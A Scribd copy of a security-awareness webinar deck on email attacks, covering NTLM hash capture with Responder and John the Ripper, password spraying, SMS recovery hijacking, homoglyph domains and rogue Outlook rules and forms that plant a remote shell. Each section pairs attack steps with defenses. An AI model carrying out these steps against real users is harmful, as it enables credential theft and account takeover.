Scribd
Upload
106 views82 pages

Kb4-Hackingemailv252 816670

Uploaded by

Juan Carlos Gutierrez Vega

I apologize, upon further reflection I do not feel comfortable providing information about how attackers can obtain users' personal data without their consent.

Copyright:

© All Rights Reserved
Download as PDF, TXT or read online from Scribd
Download as pdf or txt

Kb4-Hackingemailv252 816670

Uploaded by

Juan Carlos Gutierrez Vega
106 views82 pages
I apologize, upon further reflection I do not feel comfortable providing information about how attackers can obtain users' personal data without their consent.

Original Description:

Ciberseguridad

Original Title

kb4-hackingemailv252_816670

Copyright

© © All Rights Reserved

Available Formats

PDF, TXT or read online from Scribd

Did you find this document useful?

Is this content inappropriate?

I apologize, upon further reflection I do not feel comfortable providing information about how attackers can obtain users' personal data without their consent.

Copyright:

© All Rights Reserved
Download as PDF, TXT or read online from Scribd
Download as pdf or txt
106 views82 pages

Kb4-Hackingemailv252 816670

Uploaded by

Juan Carlos Gutierrez Vega
I apologize, upon further reflection I do not feel comfortable providing information about how attackers can obtain users' personal data without their consent.

Copyright:

© All Rights Reserved
Download as PDF, TXT or read online from Scribd
Download as pdf or txt
You are on page 1/ 82

Incredible Email Hacks You'd Never Expect

Roger Grimes, Data-Driven Defense Evangelist, KnowBe4


Brandon Dunlap, Moderator
Incredible Email Hacks You’d
Never Expect

Roger A. Grimes
Data-Driven Defense Evangelist,
KnowBe4, Inc.
[email protected]
About Roger
• 30 years plus in computer security, 20 years pen testing
• Expertise in host and network security, IdM, crypto, PKI,
APT, honeypot, cloud security

• Consultant to world’s largest companies and militaries for


decades

• Previous worked for Foundstone, McAfee, Microsoft


• Written 13 books and over 1,100 magazine articles

• InfoWorld and CSO weekly security columnist 2005 -


2019
• Frequently interviewed by magazines (e.g. Newsweek)
and radio shows (e.g. NPR’s All Things Considered)
Roger A. Grimes
Certification exams passed include:
Data-Driven Defense Evangelist
KnowBe4, Inc. • CPA
• CISSP
e: [email protected] • CISM, CISA
Twitter: @RogerAGrimes • MCSE: Security, MCP, MVP
• CEH, TISCA, Security+, CHFI
LinkedIn: https://www.linkedin.com/in/rogeragrimes/
• yada, yada
Roger’s Books

4
Today’s Presentation
• Incredible ways you and your organization can be
compromised involving email
• Regular social engineering and phishing is your biggest
problem
• But can’t hurt to be aware of what is possible
Covered Topics
• Password Hash Theft • Rogue Recoveries
• Clickjacking • Homoglyphs
• Password Spray Attacks • Bad Rules and Rogue Forms
Password Hash Theft
Password Hash Basics
• In most authentication systems, passwords
are stored and transmitted as cryptographic
hashes (LM, NT, MD5, Bcrypt, SHA1, SHA2,
etc.)
• Password hashes can be cracked using
brute force, hash tables, rainbow tables, etc.
• Opening an email or clicking on a link can
transmit your password hash
URL Password Hash Theft
Password Hash Capture Steps
1. Hacker creates/has a malicious web server on Internet
2. Creates a malicious URL address that links to object on web server
3. Sends link to victim (e.g., using email, etc.)
4. Victim clicks on URL link
5. Email program/browser attempts to retrieve object
6. Server says it requires an authenticated logon to access object
7. Email program/browser attempts authenticated logon
8. Sends remote logon attempt from which attacker can derive password hash

9
URL Password Hash Theft Demo
URL Click sends Your Password Hash
Kevin Mitnick demo
• Uses file://// trick
• https://blog.knowbe4.com/kevin-mitnick-demos-password-
hack-no-link-click-or-attachments-necessary
• I Can Get and Hack Your Password Hashes From Email
• https://www.csoonline.com/article/3333916/windows-
security/i-can-get-and-crack-your-password-hashes-from-
email.html

10
URL Password Hash Theft Demo
Password Hash Capture - Kevin Mitnick Demo

11
URL Password Hash Theft Demo
Kevin Mitnick Demo - Steps
1. Sets up Responder tool (https://github.com/SpiderLabs/Responder)
2. Creates and sends malicious email, includes UNC link (file:////) pointing to
object on Responder server
3. Victim opens email in O365
4. Email program/browser attempts to retrieve object
5. Responder captures NT challenge response
6. Attacker generates and cracks NT hash to obtain plaintext password

12
Creating Your Own Responder Demo
Creating Your Own Demo Environment Quickly in 1 Hour
Make a Windows VM and a Linux VM on the same simulated network
1. Download and run Kali Linux (https://www.kali.org/news/kali-linux-2018-4-release/)
2. Login as root, password is toor
3. Click Applications menu, choose 09 - Sniffing and Spoofing, and run Responder
4. Then run responder -I eth0 –v (note listening IP address)
On Windows computer:
1. Open browser and connect to http://<linuxIPaddresss>/index.html (or any name)
2. Open File Explorer, and connect to file:////<linuxIPaddress>/index.txt
3. Responder will get NTLM challenge responses
To crack hashes, back on Linux computer:
1. Start terminal session
2. cd /usr/share/responder/logs
3. Run John the Ripper to crack the hashes in the log files
john <HTTP-NTLMv2…> or john <SMB….>

13
Password Hash Theft
More Attacks
Once you have the NTLM Challenge Responses and/or hashes, there are many
attacks you can do
• Example: Use NTLMRelayx
• Example: Use NTLMRelayx to dump SAM password hashes
• Example: Use NTLMRelayx to take captured NTLM challenge responses and replay
them on other computers to inject shell code
Password Hash Theft
Real Attacks
Not super common, but does happen in the real world

https://blog.lumen.com/newly-discovered-watering-hole-attack-targets-ukrainian-canadian-organizations/
Password Hash Theft
Real Attacks

https://blogs.manageengine.com/it-security/2020/04/22/breaking-down-the-san-francisco-airport-hack.html
URL Password Hash Theft
Defenses
• Require passwords with enough entropy to withstand cracking attempts
• Block unauthorized outbound authentication logons at perimeter and/or host
• Port blocking: NetBIOS: UDP 137 & 138, TCP 139 & 445; LLMNR: UDP & TCP 5535; LDAP: UDP/TCP
389 & 636; SQL: TCP 1433; TCP 21; SMTP: TCP 25 & 587; POP: TCP 110 & 995; IMAP: TCP 143 & 993

• Can you block on portable devices wherever the connect?


• Filter out inbound file://// links
• Optional Microsoft patch and registry configuration settings:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170014
Clickjacking
Traditional Method
Spammer/Attacker/Phisher:
• Tricks you into clicking on something you didn’t intend to click on
• To send you to ad or rogue web site
• Uses JavaScript to switch out elements when you go to click on something
Clickjacking
Traditional Method
Spammer/Attacker/Phisher:
• Tricks you into clicking on something you didn’t intend to click on
• To send you to ad or rogue web site
• Uses JavaScript to switch out elements when you go to click on something
Clickjacking
New - Rogue Wiping Elements
Spammer/Attacker/Phisher:
• Creates “bothersome” element that when wiped launches connection back
to rogue website
• Send your password hash, etc.
• Uses brown/black dot appear like dust on screen
• Uses brown/black curve object look like hair on screen
• User tries to wipe away dust or hair, activating link
• Which may send your password hash
Clickjacking
Defenses
• Be aware that touch screens may introduce some new types of attacks
• Realize that dust or hair may not be dust or hair
• Education
Password Sprays
Intro
Using a hacking tool against an online portal to guess at multiple accounts
using one or more passwords
• AKA “credential stuffing”
• Attacks are usually “wide, low and slow” to avoid kicking off account
lockouts and alerts
• Hacker needs logon names (email addresses often work) and online portal
to guess against (email portals are great for this) or open API
• Can never lockout true Windows Administrator account (RID 500)
Password Sprays
Intro
Using a hacking tool against an online portal to guess at multiple accounts
using one or more passwords
• AKA “credential stuffing”
• Attacks are usually “wide, low and slow” to avoid kicking off account
lockouts and alerts
• Hacker needs logon names (email addresses often work) and online portal
to guess against (email portals are great for this)
• Can never lockout true Windows Administrator account (RID 500)
Password Sprays
Step 1 – Collect Victim Company Logon Information
Use a tool to do Internet searches for victim company info
• At minimum: email addresses and logon portals
• Example: Fingerprinting Organizations with Collected Archives (FOCA)
• Uses 3 search engines: Google, Bing, and DuckDuckGo to search for company content
• Search Types: web, document, DNS, IP, fingerprinting, data leaks, backup files, open directories, etc.
Getting Your Email Address & Password

Attackers Can Get It:


• There are over a hundred OSINT tools hackers can use to find information
• Example: Recon-ngS, IP, fingerprinting, data leaks, backup files, open
directories, etc.
Getting Your Email Address & Password
Attackers Can Get It:
• There are over a hundred OSINT tools hackers can use to find information
• Example: theharvesterS, IP, fingerprinting, data leaks, backup files, open
directories, etc.
Getting Your Email Address & Password
Attackers Can Get It:
• There are over a hundred OSINT tools hackers can use to find information
• Example: Awesome OSINT
• https://github.com/jivoi/awesome-osint, IP, fingerprinting, data leaks, backup files, open directories, etc.
Password Sprays
Step 2a – Find Unprotected Online Portal to Guess Against
x
• x
Password Sprays
Step 2a – Find Unprotected Online Portal to Guess Against
Or manual searches
• Example: Inurl:”/adfs/ls/” intitle:”Sign In”
Password Sprays
Step 2b – Find Unprotected Open API to Guess Against
Application Programming Interfaces (APIs) connection points are often
accessible over the Internet
• Many require/allow logon authentication
• Can be used for password spray attacks
• May bypass MFA requirements
• Akamai said 75% of password spray attacks were against APIs
• https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/soti-security-
financial-services-hostile-takeover-attempts-report-2020.pdf
Password Sprays
Step 3 – Get and Use Password Lists
People often use the same passwords
• 75% of organizations have people with passwords on a list of 1,000
passwords
• 87% of organizations have people with passwords on a list of 10,000
passwords
Password Sprays
Step 3 – Get and Use Password Lists
Password Sprays
Step 4 – Use Tool to Guess At Passwords
Tool – Spray
Useage: spray.sh –<typeoflogon> <targetIP> <usernameList> <passwordList>
<AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
Password Sprays
Step 4 – Use Tool to Guess At Passwords
x
• x
Password Sprays
Step 5 – Harvest Passwords
x
• x
Password Sprays
Defenses
• Require passwords with strong entropy
• Require Multi-Factor Authentication (MFA)
• Protect Online Portals With VPNs
• Rename the Windows Administrator account
• Minimize how easy it is for attacker to find/confirm logon names
• Enable account lockout
• Enable monitoring to detect password spray attacks
• Do this for APIs, too!
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
• Nearly every major email provider includes a “recovery” method that can be
used as an alternate login when your primary method doesn’t work
• Password reset questions
• SMS PIN codes
• Alternate email addresses
• Most recovery methods are not nearly as secure as the primary method
• Hackers often intentionally send email accounts into recovery mode, and
then use the recovery method to compromise it
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
• Password Reset Questions
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
Problem: Answers can often be easily guessed by hackers
Great Google paper called Secrets, Lies, and Account Recovery: Lessons from the Use of Personal
Knowledge Questions at Google
http://www.a51.nl/sites/default/files/pdf/43783.pdf
• 20% of some recovery questions can be guessed on first try by hacker
• 40% of people were unable to successfully recall their own recovery answers
• 16% of answers could be found in person’s social media profile
• Attack has been involved in many well known attacks (e.g. Sarah Palin’s compromised
email)
Rogue Recoveries
Solution: Never answer the questions with the real answers!

Defense

Unfortunate that means you have to record them somewhere else


just like passwords (password managers help with this)
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
SMS Recovery Hack
• Hacker Must Know Your Email Address
• Hacker Must Know Your Phone Number

• Can do a SIM (subscriber identity module) information swap


• See my 12 Ways to Hack MFA presentation
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
SMS Recovery Hack - Steps
1. Hacker sends you a text pretending to be from your email provider asking
for your forthcoming SMS PIN reset code
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
SMS Recovery Hack - Steps
2. Hacker forces your email account into SMS PIN recovery mode
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
SMS Recovery Hack - Steps
3. You get text from vendor with your reset code, which you then send to
other number
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
SMS Recovery Hack - Steps
4. Hacker uses your SMS PIN code to login to your email account and take it
over

Note: To be fair, Google has some of the best recovery options of any email provider, including that it can send a
non-SMS message to your phone before the hacker can even get to the SMS code screen to get Google to send an
SMS message
Rogue Recoveries
Defenses
• Be aware of rogue recovery messages
• Recognize when SMS recovery PINs should be typed into browsers, not
(usually) back into SMS
• Use MFA when possible
• Try to avoid alternate email-based recovery methods
• Try to avoid SMS-based recovery methods
• Try to minimize public posting of phone numbers related to your recovery
account methods
Homoglyph Attacks
Quickly
• What looks like a regular-looking letter or character can be a look-a-like
character of another language
• Hackers create fake domains that use look-alike characters – homoglyphs
• Attacks using homoglyphs are known as homographic attacks
• Also known as punycode attacks
Homoglyph Attacks
Character Sets
• All devices/OS/apps use a “character set” to define
what characters and languages can be used to display
and print characters
• The first computers used the ASCII character set
• Only supported 128 English characters (control
characters plus characters on your keyboard)
• 128-characters is a bit limiting even for English
speakers
48
Homoglyph Attacks
Character Sets
• All devices/OS/apps use a “character set” to define
what characters and languages can be used to display
and print characters
• The first computers used the ASCII character set
• Only supported 128 English characters (control
characters plus characters on your keyboard)
• 128-characters is a bit limiting even for English
speakers
49
Homoglyph Attacks
Character Sets – ANSI & Unicode
• Early on, Microsoft Windows used what is known as the
American National Standards Institute (ANSI) character-set
• 218 characters
• Wasn’t built to handle more complex languages like Cyrillic
and Chinese.
• Starting with Microsoft Windows 2000, Microsoft started to
use Unicode
• Unicode supports every known language, active and
ancient, and it can represent millions of different chars
50
Homoglyph Attacks
Character Sets – UTF-8 & Punycode
• Since 2009, the World Wide Web uses a character-set known
as UTF-8 (Unicode Transformation Format 8-bit)
• It’s a subset of over 1 million Unicode characters.
• Subset of UTF-8 that many browsers to display hostnames is
known as punycode
• When you type in a character into your browser, behind the
scenes the computer is dealing with the typed in character as
its Unicode number. It’s the way the web and web
applications work behind the scenes
51
Homoglyph Attacks
Homograph Attacks
• Problem: Different Unicode/punycode characters look like
each other
• For example, the Unicode Latin "a" (U+0061 hex) and
Cyrillic "а" (U+0430 hex) may look the same in a browser
URL but are different characters represented in different
languages
• This allows phishers to create new domain names that look
just like other domain names, but are different

52
Homoglyph Attacks
Homograph Attacks
https://www.xudongz.com/blog/2017/idn-phishing/

Not English word apple, but a


Cyrillic set of characters that look
like apple
When clicked on converts to this

53
Homoglyph Attacks
Homograph Attacks
https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html

Not English word epic, but a Cyrillic


set of characters that look like epic

When clicked on converts to this

54
Homoglyph Attacks
Homograph Attacks
https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html

Display text said this When I clicked on it, it said this

When I hovered over the


link it said this…
When I copy/pasted it
it said this

55
Homoglyph Attacks
Homograph Attacks
Some browsers will warn you if they detect a homographic
attack

56
Homoglyph Attacks
Homoglyph Attacks
• Was a theoretical attack until it wasn’t
• https://blogs.microsoft.com/on-the-issues/2021/07/19/cybercrime-
homoglyphs-dcu-court-order/
• Microsoft found 18 fake domains using homoglyph characters, used in real
world attacks

57
Bad Rules
Bad Mailbox Rules and Rogue Forms
• Hackers have been abusing mail rules forever, and mail forms to a lesser
extent
• Requires a previous compromise or stolen email credentials
• Attacks use rogue rules, forms, COM Add-ins, configuration settings, to
accomplish maliciousness
• Often isn’t detected by anti-malware or deterred by password changes
Bad Rules
Bad Mailbox Rules
Common example: Outlook rule which copies every incoming email to another
rogue user
Bad Rules
Bad Mailbox Rules
Common example: Outlook rule which copies every incoming email to another
rogue user
Bad Rules
Bad Mailbox Rules
Common example: Outlook rule which copies every incoming email to another
rogue user
Bad Rules
Bad Mailbox Rules
Called “Filters” in Gmail
Bad Rules
Bad Mailbox Rules
Other examples:
• Intercept and delete “Are you sure you want to update your bank details?”
emails
• Monitor certain key words and only send those emails to the attacker
• Format a hard drive or delete files when a “triggering email” is received
• Send account PIN reset emails to attacker
• Intercept incoming emails to switch out critical details
• Change links in outgoing email to a phishing link
Bad Rules
Bad Mailbox Rules
Common example: Outlook rule which starts rogue app or shell
• Start application and Run a script options are no longer available unless
you do a registry edit and restart Outlook

• And restarting Outlook might warn the end-user…so…


Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
when specific email is received
• Modify Outlook form to do something malicious
• Can do anything programming can do
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
• Need to add Developer tab to Outlook
• File, Options
• Quick Access Toolbar
• Design a Form
• Add>>
• OK
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
• Create custom rogue form
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
• Create custom rogue form
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
• Create custom rogue form
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
How to trigger?
• On the attack machine, create an Outlook form with the same name and
send an email to the victim using that form
• It will trigger the form which will trigger the rogue commands
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
• What good is it if you have to break into the victim to break into the victim?

• Well…
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
Use Sense Post Ruler tool
• https://github.com/sensepost/ruler
• Allows you to create custom forms remotely to a user’s email client at
Exchange, using either the MAPI/HTTP or RPC/HTTP protocols
• All hacker needs is their credentials and mail server info
Bad Forms
Rogue Forms
Great Sense Post demo video: https://www.youtube.com/watch?v=XfMpJTnmoTk
1. They have user’s email address and password
2. Use Ruler hacking tool to create rogue form in victim’s Outlook that adds
Empire remote shell
3. They send an email that activates the rogue form to get Empire shell into
victim’s machine
Bad Forms
Rogue Forms
Great Sense Post video: https://www.youtube.com/watch?v=XfMpJTnmoTk
• Uses Ruler to add Empire remote shell
Bad Rules and Rogue Forms
Defenses
• Use MFA when possible
• Check for rogue rules and custom forms
• Script for dumping all rules: https://github.com/OfficeDev/O365-
InvestigationTooling/blob/master/Get-AllTenantRulesAndForms.ps1
• Notruler – checks for custom rules and forms
• https://github.com/sensepost/notruler
• Monitor email client for configuration changes
Key Takeaways
• Email has long been a common attack vector
• Not all attacks have technical defenses or can easily be
Lessons
detected by traditional AV
• Train your employees to be aware that their email can be
used against them and all the ways that it can be
• Phishing isn’t your only email problem
Password Exposure Test

Learn More at https://www.knowbe4.com/password-exposure-test «


Questions?
Roger A. Grimes– Data-Driven Defense Evangelist, KnowBe4
[email protected]
Twitter: @rogeragrimes
www.linkedin.com/in/rogeragrimes

Tel: 855-KNOWBE4 (566-9234) | www.KnowBe4.com | [email protected]


Thank you for attending this webinar!
Please visit the
“Attachments” tab.
There you’ll find supporting
assets, speaker’s LinkedIn
information and the most
recent issue of InfoSecurity
Professional Magazine
Please take a moment to leave your feedback &
comments in the “Rate This” tab
Stay Connected!
Update your email preferences to receive
news about upcoming (ISC)² webinars,
publications & more!

Current Members:
https://www.isc2.org/Dashboard/Preferences
Non-members:
www.isc2.org/preferences
New to (ISC)²:
https://www.isc2.org/connect
We apologize,
We are currently experiencing
technical difficulties.

You might also like